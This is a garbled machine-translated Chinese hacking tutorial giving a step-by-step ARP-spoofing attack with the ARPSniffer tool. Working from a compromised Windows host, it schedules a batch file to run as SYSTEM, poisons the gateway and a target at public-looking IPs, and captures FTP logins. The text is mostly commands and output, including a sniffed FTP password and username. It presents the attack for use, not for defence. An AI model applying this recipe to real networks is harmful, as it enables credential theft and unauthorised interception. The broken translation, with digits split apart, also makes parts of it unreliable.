ARPSniffer get the highest permissions-bug warning-the black bar safety net

2005-12-03T00:00:00
ID MYHACK58:6220055050
Type myhack58
Reporter 佚名
Modified 2005-12-03T00:00:00

Description

Suppose you want to attack the host IP is:61.139.1.79 The same subnet the next, we have the right to limit the host IP is:61.139.1. 8 8 and 3 3 8 9 landing

The first step: tracert 61.139.1.1

C:\WIN2000\system32>tracert 61.139.1.1

Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 3 0 hops:

1 <1 0 ms <1 0 ms <1 0 ms HACK-4FJ7EARC [61.139.1.1]

Trace complete.

This shows you want to attack the host and you host in a closed network, then it is possible For ARPSNIFFER.

The second step:look at the IP settings and the NIC situation C:\WIN2000\system32>ipconfig /all

Windows 2 0 0 0 IP Configuration

Host Name. . . . . . . . . . . . : smscomputer Primary DNS Suffix. . . . . . . : Node Type. . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : No. WINS Proxy Enabled. . . . . . . . : No.

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

Connection-specific DNS Suffix . : Description. . . . . . . . . . . : Intel(R) 8255x Based Network Connection Physical Address. . . . . . . . . : 0 0-B0-D0-2 2-1 0-C6 DHCP Enabled. . . . . . . . . . . : No. IP Address. . . . . . . . . . . . : 61.139.1.2 Subnet Mask. . . . . . . . . . . : 255.255.255.0 Default Gateway. . . . . . . . . : 61.139.1.65 DNS Servers. . . . . . . . . . . : 61.139.1.73

Description only a piece of card then in the implementation of the ARPSNIFFER when you can do not the fifth parameter in this manner Above a small Banyan Tree home page may not say yo,after the test I realized that if only a piece of card you fifth parameters use 0 Words can only sniff through the data yo. From the above we can also know the gateway is 6 1. 1 3 9. 1. 6 5

Step three:view the local time C:\WIN2000\system32>net time \\127.0.0.1

\\127.0.0.1 the current time is 2003/1/28 PM 0 9:1 3

The command completed successfully

Note that here the time is 1 2 hours,use the at command should be 2 to 4 hours of Formula

Fourth step:Write A Start ARPsniffer bat file C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 2 1 1.txt /reset>c:\winnt\a.bat

Note. We do not have to be the fifth parameter,if there is more than one network card then you must first direct the implementation arpsniffer display as follows: ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2 0 0 2, security@vip.sina.com

Network Adapter 0: D-Link DE-5 2 8 Ethernet PCI Adapter Network Adapter 1: Intel(R) PRO/1 0 0+ PCI Adapter(this place selected the fifth parameter)

Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]

The fifth step:running in the background to start sniffing. C:\winnt\system32>at \\127.0.0.1 2 0:4 4 c:\winnt\a.bat

Note:here the time to be with a 2 4-hour formula arpsniffer the best copy to the system32 directory,the log file is also generated here. After executing the fourth step is to install WINPCAP 2.1 driver At the same time arpsniffer want to use latest of 0. 5 version,old version have some BUG and you want to change the registry reboot the machine

The sixth step:see code, but the generated recording file can not directly see but also can not be copied so we can be the first end off To SYSTEM permissions to start the ARPSniffer program C:\winnt\system32>pulist ................... conime.exe 2 4 8 NT AUTHORITY\SYSTEM explorer.exe 1 8 6 4 SMSCOMPUTER\Administrator CSRSS.EXE 2 2 5 6 NT AUTHORITY\SYSTEM Arpsniffer.exe 2 3 2 2 NT AUTHORITY\SYSTEM----this is it! WINLOGON.EXE 2 3 4 4 NT AUTHORITY\SYSTEM ......................

Kill it C:\winnt\system32>pskill 2 3 2 2 PsKill v1. 0 3 - local and remote process killer Copyright (C) 2 0 0 0 Mark Russinovich http://www.sysinternals.com

Process 2 3 2 2 killed.

C:\winnt\system32>type 1.txt my example sniffing the FTP password:)

............... 61.188.218.179(1 4 0 4)->61.139.1.79(2 1)PASS aaabbb 61.139.1.79(2 1)->61.188.218.179(1 4 0 4)5 3 0 User czy82 cannot log in. 61.139.1.79(2 1)->61.188.218.179(1 4 0 4)5 3 0 User czy82 cannot log in. 61.188.218.179(1 4 0 4)->61.139.1.79(2 1)QUIT 61.188.218.179(1 4 0 4)->61.139.1.79(2 1)QUIT 61.139.1.79(2 1)->61.188.218.179(1 4 0 4)2 2 1 61.139.1.79(2 1)->61.188.218.179(1 4 0 4)2 2 1 ............ ............

Particular attention is to PASS ha:)

---------------------------------------------------- Pay record: The reception is normally performed is displayed

C:\>arpsniffer 61.139.1.65 61.139.1.79 2 1 1.txt /reset

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2 0 0 2, security@vip.sina.com

Network Adapter 0: Intel(R) 8255x Based Network Connection

Enable IP Router.... OK

Get 61.139.1.65 Hardware Address: 00-00-0c-0 7-ac-0 2 Get 61.139.1.79 Hardware Address: 0 0-b0-d0-2 2-1 0-cb Get 61.139.1.88 Hardware Address: 0 0-b0-d0-2 2-1 0-c6

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88 Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88 Sometimes here to be the first show can not open driver(0)no matter what it wait on it Begin Sniffer.........